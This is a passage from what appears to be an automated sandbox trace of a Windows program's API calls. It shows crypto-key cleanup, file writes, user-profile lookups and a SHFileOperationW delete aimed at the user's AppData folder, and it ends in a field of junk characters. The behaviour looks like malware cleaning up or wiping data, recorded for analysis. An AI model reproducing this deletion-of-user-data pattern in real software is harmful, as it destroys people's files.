wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.062] WriteFile (in: hFile=0x4dc, lpBuffer=0x2a72718*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72718*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0154.063] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.063] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.063] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0154.063] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.063] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0154.063] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.063] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.063] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.063] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0154.063] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.063] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0154.063] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0154.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0154.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa918, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0154.064] CryptDestroyKey (hKey=0x9e2078) returned 1 [0154.064] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.064] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.064] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0154.064] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.064] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0154.064] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.064] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.064] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0154.064] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.064] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0154.064] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.064] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.064] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.064] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.069] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.069] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0154.069] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.069] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.069] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0154.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.069] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0154.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.069] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0154.069] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.069] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0154.069] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.070] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.070] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.070] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.070] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.070] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.070] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.070] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.070] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0154.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.070] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0154.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0154.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0154.070] CryptReleaseContext (hProv=0x9beab0, dwFlags=0x0) returned 1 [0154.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.070] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.070] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.071] FreeLibrary (hLibModule=0x76390000) returned 1 [0154.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.071] CloseHandle (hObject=0x4dc) returned 1 [0154.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.072] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.072] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.072] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.072] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Application Data", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data", lpFilePart=0x8cedf4*="Application Data") returned 0x2e [0154.072] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\application data")) returned 0x2416 [0154.072] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x15, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="", cAlternateFileName="")) returned 0xffffffff [0154.072] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0154.072] GetLastError () returned 0x6 [0154.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0154.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0154.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0154.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0154.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.072] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0154.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0154.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0154.073] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0154.073] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0154.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a683a8 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a74a50 [0154.075] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Application Data", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data", lpFilePart=0x8cf650*="Application Data") returned 0x2e [0154.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0154.075] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\application data")) returned 0x2416 [0154.075] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ